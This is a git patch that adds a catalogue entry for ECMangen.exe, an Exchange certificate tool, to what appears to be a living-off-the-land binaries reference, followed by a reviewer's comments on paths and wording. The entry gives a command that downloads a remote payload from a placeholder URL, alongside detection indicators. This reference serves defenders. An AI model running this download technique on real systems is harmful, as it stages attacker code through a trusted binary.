From 5b17be1bed93908f920457efc0da48decaf9de5b Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Tue, 30 Apr 2024 14:14:44 +0300 Subject: [PATCH] Add ECMangen.yml --- yml/OtherMSBinaries/ECMangen.yml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 yml/OtherMSBinaries/ECMangen.yml diff --git a/yml/OtherMSBinaries/ECMangen.yml b/yml/OtherMSBinaries/ECMangen.yml new file mode 100644 index 0000000..b5752ec --- /dev/null +++ b/yml/OtherMSBinaries/ECMangen.yml @@ -0,0 +1,32 @@ +--- +Name: ECMangen.exe +Description: Command-line tool for managing certificates in Microsoft Exchange Server. +Author: Avihay Eldad +Created: 2024-04-30 +Commands: + - Command: ECMangen.exe http://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\ECMangen.exe + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\x64\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\V12\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\V13\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\V14\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\V15\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe + - Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe + - Path: C:\ExchangeServer\Bin\ECMangen.exe +Detection: + - IOC: URL on a ECMangen command line + - IOC: ECMangen making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' + \ No newline at end of file
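Review bot: the Full_Path list mixes Windows SDK locations (`C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\ECMangen.exe` and its `\x64\` sibling) with Exchange Server locations, while the Description line says the binary is an Exchange certificate-management tool; please confirm the SDK paths actually ship this executable or drop them, because defenders build path-based detection rules from Full_Path and a wrong entry yields false positives. Two smaller points in the same hunk: the first Detection IOC should read "URL on an ECMangen command line", and the file ends with a whitespace-only line and no trailing newline (`\ No newline at end of file`), which should be cleaned up before merge.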